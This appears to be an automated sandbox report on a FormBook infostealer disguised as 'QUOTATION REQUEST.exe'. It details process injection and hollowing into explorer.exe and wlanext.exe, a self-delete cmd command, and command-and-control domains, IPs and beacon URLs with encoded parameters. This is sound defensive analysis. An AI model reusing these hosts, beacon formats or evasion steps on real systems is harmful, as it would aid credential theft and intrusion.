Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0368C450 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0362BC2C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036C740D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036C740D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036C740D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036B1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036B1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036B1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036B1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036B1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036B1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036B1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036B1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036B1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036B1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036B1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036B1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036B1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036B1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03676C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03676C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03676C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03676C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036B14FB mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03676CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03676CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_03676CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_036C8CD6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 9_2_0360849B mov eax, dword ptr fs:[00000030h]

Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\wlanext.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Domain query: www.zryld.com
Source: C:\Windows\explorer.exe	Domain query: www.sloanksmith.com
Source: C:\Windows\explorer.exe	Domain query: www.pedroiniesta.net
Source: C:\Windows\explorer.exe	Domain query: www.shop-daily.info
Source: C:\Windows\explorer.exe	Domain query: www.letsratethis.com
Source: C:\Windows\explorer.exe	Domain query: www.inthebeginningshop.com
Source: C:\Windows\explorer.exe	Domain query: www.freecleanlimpieza.com
Source: C:\Windows\explorer.exe	Network Connect: 81.17.18.196 80
Source: C:\Windows\explorer.exe	Domain query: www.buffalobooze.com
Source: C:\Windows\explorer.exe	Domain query: www.madisonroselove.com
Source: C:\Windows\explorer.exe	Network Connect: 206.189.50.215 80
Source: C:\Windows\explorer.exe	Network Connect: 192.185.131.134 80
Source: C:\Windows\explorer.exe	Domain query: www.checkmytradesmanswork.com
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe	Domain query: www.colabchat.com
Source: C:\Windows\explorer.exe	Network Connect: 74.208.236.36 80
Source: C:\Windows\explorer.exe	Domain query: www.bestsellerselect.com
Source: C:\Windows\explorer.exe	Domain query: www.graet.design
Source: C:\Windows\explorer.exe	Network Connect: 46.30.211.38 80
Source: C:\Windows\explorer.exe	Domain query: www.cannabisllp.com

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Section loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Section loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\wlanext.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\wlanext.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Thread register set: target process: 3388
Source: C:\Windows\SysWOW64\wlanext.exe	Thread register set: target process: 3388

Queues an APC in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Sample uses process hollowing technique

Show sources

Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe

Section unmapped: C:\Windows\SysWOW64\wlanext.exe base address: 1260000

Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Process created: C:\Users\user\Desktop\QUOTATION REQUEST.exe C:\Users\user\Desktop\QUOTATION REQUEST.exe
Source: C:\Windows\SysWOW64\wlanext.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\QUOTATION REQUEST.exe'

Source: explorer.exe, 00000005.00000002.482293325.0000000001398000.00000004.00000020.sdmp	Binary or memory string: ProgmanamF
Source: explorer.exe, 00000005.00000000.231234912.0000000001980000.00000002.00000001.sdmp, wlanext.exe, 00000009.00000002.486088950.0000000005CF0000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000005.00000000.231234912.0000000001980000.00000002.00000001.sdmp, wlanext.exe, 00000009.00000002.486088950.0000000005CF0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000005.00000000.231234912.0000000001980000.00000002.00000001.sdmp, wlanext.exe, 00000009.00000002.486088950.0000000005CF0000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000005.00000000.231234912.0000000001980000.00000002.00000001.sdmp, wlanext.exe, 00000009.00000002.486088950.0000000005CF0000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Queries volume information: C:\Users\user\Desktop\QUOTATION REQUEST.exe VolumeInformation
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation

Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000003.00000002.269105881.0000000001260000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.481398229.0000000000ED0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.229469085.0000000003639000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.483772620.00000000033B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.483689889.0000000003380000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.269223785.00000000016B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.268768212.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 3.2.QUOTATION REQUEST.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.QUOTATION REQUEST.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.QUOTATION REQUEST.exe.36d2a18.3.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000003.00000002.269105881.0000000001260000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.481398229.0000000000ED0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.229469085.0000000003639000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.483772620.00000000033B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.483689889.0000000003380000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.269223785.00000000016B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.268768212.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 3.2.QUOTATION REQUEST.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.QUOTATION REQUEST.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.QUOTATION REQUEST.exe.36d2a18.3.raw.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Shared Modules1	Path Interception	Process Injection512	Masquerading1	OS Credential Dumping	Security Software Discovery221	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Disable or Modify Tools1	LSASS Memory	Process Discovery2	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Ingress Tool Transfer3	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Virtualization/Sandbox Evasion31	Security Account Manager	Virtualization/Sandbox Evasion31	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Process Injection512	NTDS	Remote System Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol13	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Deobfuscate/Decode Files or Information1	LSA Secrets	System Information Discovery112	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Obfuscated Files or Information4	Cached Domain Credentials	System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Software Packing3	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
QUOTATION REQUEST.exe	19%	Virustotal		Browse
QUOTATION REQUEST.exe	34%	ReversingLabs	ByteCode-MSIL.Trojan.AgentTesla

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
3.2.QUOTATION REQUEST.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen		Download File

Domains

Source	Detection	Scanner	Label	Link
www.madisonroselove.com	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.letsratethis.com/n7ad/?bl=1rASbdTsLtsxQtx7SVeMPm6+5xONVyhrdB7mHEgQEcexIDozAv+yH2W2ARkxKFvsjoxU&uTgL=M6Al	0%	Avira URL Cloud	safe
http://www.buffalobooze.com/n7ad/?bl=3Beq3lgI6UHTLP/Ph9xH30PGCdCNNtH+lu9vUppUW1NTSJAeHuoOIBtndyRiz3KwYif9&uTgL=M6Al	0%	Avira URL Cloud	safe
www.pedroiniesta.net/n7ad/	0%	Avira URL Cloud	safe
http://www.freecleanlimpieza.com/n7ad/?bl=m2HasfwKJqOnivj33UsuzcdiGSf95h/71RH21qYEgR61Ll0cP2jFCaQDWCmKDc63e7Zh&uTgL=M6Al	0%	Avira URL Cloud	safe
http://www.sloanksmith.com/n7ad/?bl=Eq/FwtusPiugr/rOaWravHpFP32Pbco6wnD+p0CDgWeo4mVef5wl6f/Ws9GFZd9hVlol&uTgL=M6Al	0%	Avira URL Cloud	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.checkmytradesmanswork.com/n7ad/?bl=Puv/nYz2ehHi82u6CLpica4tA5y7A2oAoTVRqDemxJRG3nb9hDTrPyPUdUehoaPW3KLQ&uTgL=M6Al	0%	Avira URL Cloud	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
https://www.freecleanlimpieza.com/n7ad/?bl=m2HasfwKJqOnivj33UsuzcdiGSf95h/71RH21qYEgR61Ll0cP2jFCaQDW	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.graet.design/n7ad/?bl=2U/v4DZudtCtKNEpNcyI8CRPeodRf0IJyZopOKgcJ9ZvO/nIRtlTdWl2MHOFm/qEgPrh&uTgL=M6Al	0%	Avira URL Cloud	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.madisonroselove.com/n7ad/?bl=qa2xgx7e5WCBLzYnkogL20jLY4d2MJB4UugdV3pZH4CGnIGrQzpXbQB2X2xqi6qVP90G&uTgL=M6Al	0%	Avira URL Cloud	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.inthebeginningshop.com/n7ad/?bl=0nOrGG/dP8nX9ss6J8VJCOtskRWUcCjTb/L7IGsTqq8ZAGYUgptJ/YsQJEIM2Q4SHR3g&uTgL=M6Al	0%	Avira URL Cloud	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.pedroiniesta.net/n7ad/?bl=Qaff1jmf/WOjI2zVxXueSV7DqvqvSgTESbm8GMviNW1Wc3TSdSF2c0Ut34b2CH/EdSK4&uTgL=M6Al	0%	Avira URL Cloud	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.cannabisllp.com/n7ad/?bl=Nvf62Ubmifj7PfGA1A/q0uZrlG7ppTSV9dUQibuGvO9bggeeu0voIlbclGtGRlSBmBIt&uTgL=M6Al	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.madisonroselove.com	81.17.18.196	true	true	0%, Virustotal, Browse	unknown
www.sloanksmith.com	74.208.236.36	true	true		unknown
letsratethis.com	34.102.136.180	true	false		unknown
www.pedroiniesta.net	206.189.50.215	true	true		unknown
checkmytradesmanswork.com	34.102.136.180	true	false		unknown
cannabisllp.com	34.102.136.180	true	false		unknown
inthebeginningshop.com	34.102.136.180	true	false		unknown
www.graet.design	46.30.211.38	true	true		unknown
buffalobooze.com	34.102.136.180	true	false		unknown
freecleanlimpieza.com	192.185.131.134	true	true		unknown
www.zryld.com	unknown	unknown	true		unknown
www.shop-daily.info	unknown	unknown	true		unknown
www.xoyicgv.icu	unknown	unknown	true		unknown
www.letsratethis.com	unknown	unknown	true		unknown
www.inthebeginningshop.com	unknown	unknown	true		unknown
www.freecleanlimpieza.com	unknown	unknown	true		unknown
www.buffalobooze.com	unknown	unknown	true		unknown
www.checkmytradesmanswork.com	unknown	unknown	true		unknown
www.colabchat.com	unknown	unknown	true		unknown
www.bestsellerselect.com	unknown	unknown	true		unknown
www.cannabisllp.com	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.letsratethis.com/n7ad/?bl=1rASbdTsLtsxQtx7SVeMPm6+5xONVyhrdB7mHEgQEcexIDozAv+yH2W2ARkxKFvsjoxU&uTgL=M6Al	false	Avira URL Cloud: safe	unknown
http://www.buffalobooze.com/n7ad/?bl=3Beq3lgI6UHTLP/Ph9xH30PGCdCNNtH+lu9vUppUW1NTSJAeHuoOIBtndyRiz3KwYif9&uTgL=M6Al	false	Avira URL Cloud: safe	unknown
www.pedroiniesta.net/n7ad/	true	Avira URL Cloud: safe	low
http://www.freecleanlimpieza.com/n7ad/?bl=m2HasfwKJqOnivj33UsuzcdiGSf95h/71RH21qYEgR61Ll0cP2jFCaQDWCmKDc63e7Zh&uTgL=M6Al	true	Avira URL Cloud: safe	unknown
http://www.sloanksmith.com/n7ad/?bl=Eq/FwtusPiugr/rOaWravHpFP32Pbco6wnD+p0CDgWeo4mVef5wl6f/Ws9GFZd9hVlol&uTgL=M6Al	true	Avira URL Cloud: safe	unknown
http://www.checkmytradesmanswork.com/n7ad/?bl=Puv/nYz2ehHi82u6CLpica4tA5y7A2oAoTVRqDemxJRG3nb9hDTrPyPUdUehoaPW3KLQ&uTgL=M6Al	false	Avira URL Cloud: safe	unknown
http://www.graet.design/n7ad/?bl=2U/v4DZudtCtKNEpNcyI8CRPeodRf0IJyZopOKgcJ9ZvO/nIRtlTdWl2MHOFm/qEgPrh&uTgL=M6Al	true	Avira URL Cloud: safe	unknown
http://www.madisonroselove.com/n7ad/?bl=qa2xgx7e5WCBLzYnkogL20jLY4d2MJB4UugdV3pZH4CGnIGrQzpXbQB2X2xqi6qVP90G&uTgL=M6Al	true	Avira URL Cloud: safe	unknown
http://www.inthebeginningshop.com/n7ad/?bl=0nOrGG/dP8nX9ss6J8VJCOtskRWUcCjTb/L7IGsTqq8ZAGYUgptJ/YsQJEIM2Q4SHR3g&uTgL=M6Al	false	Avira URL Cloud: safe	unknown
http://www.pedroiniesta.net/n7ad/?bl=Qaff1jmf/WOjI2zVxXueSV7DqvqvSgTESbm8GMviNW1Wc3TSdSF2c0Ut34b2CH/EdSK4&uTgL=M6Al	true	Avira URL Cloud: safe	unknown
http://www.cannabisllp.com/n7ad/?bl=Nvf62Ubmifj7PfGA1A/q0uZrlG7ppTSV9dUQibuGvO9bggeeu0voIlbclGtGRlSBmBIt&uTgL=M6Al	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.apache.org/licenses/LICENSE-2.0	explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com	explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com/designersG	explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com/designers/?	explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn/bThe	explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers?	explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.tiro.com	explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers	explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.goodfont.co.kr	explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css	QUOTATION REQUEST.exe, 00000000.00000002.228270852.0000000002685000.00000004.00000001.sdmp	false		high
http://www.carterandcone.coml	explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.sajatypeworks.com	explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.typography.netD	explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/cabarga.htmlN	explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn/cThe	explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://fontfabrik.com	explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.founder.com.cn/cn	explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/frere-jones.html	explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	false		high
https://www.freecleanlimpieza.com/n7ad/?bl=m2HasfwKJqOnivj33UsuzcdiGSf95h/71RH21qYEgR61Ll0cP2jFCaQDW	wlanext.exe, 00000009.00000002.485777582.0000000003D12000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/	explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.galapagosdesign.com/DPlease	explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers8	explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.fonts.com	explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.sandoll.co.kr	explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.urwpp.deDPlease	explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	QUOTATION REQUEST.exe, 00000000.00000002.228172147.0000000002631000.00000004.00000001.sdmp	false		high
http://www.sakkal.com	explorer.exe, 00000005.00000000.253164003.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://github.com/unguest	QUOTATION REQUEST.exe	false		high
https://github.com/unguest9WinForms_RecursiveFormCreate5WinForms_SeeInnerExceptionGProperty	QUOTATION REQUEST.exe	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
206.189.50.215	www.pedroiniesta.net	United States	14061	DIGITALOCEAN-ASNUS	true
192.185.131.134	freecleanlimpieza.com	United States	46606	UNIFIEDLAYER-AS-1US	true
34.102.136.180	letsratethis.com	United States	15169	GOOGLEUS	false
74.208.236.36	www.sloanksmith.com	United States	8560	ONEANDONE-ASBrauerstrasse48DE	true
46.30.211.38	www.graet.design	Denmark	51468	ONECOMDK	true
81.17.18.196	www.madisonroselove.com	Switzerland	51852	PLI-ASCH	true

General Information

Joe Sandbox Version:	32.0.0 Black Diamond
Analysis ID:	402973
Start date:	03.05.2021
Start time:	16:49:20
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 11m 4s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	QUOTATION REQUEST.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	26
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@7/1@15/6
EGA Information:	Failed
HDC Information:	Successful, ratio: 16.1% (good quality ratio 15%) Quality average: 76.4% Quality standard deviation: 29.2%
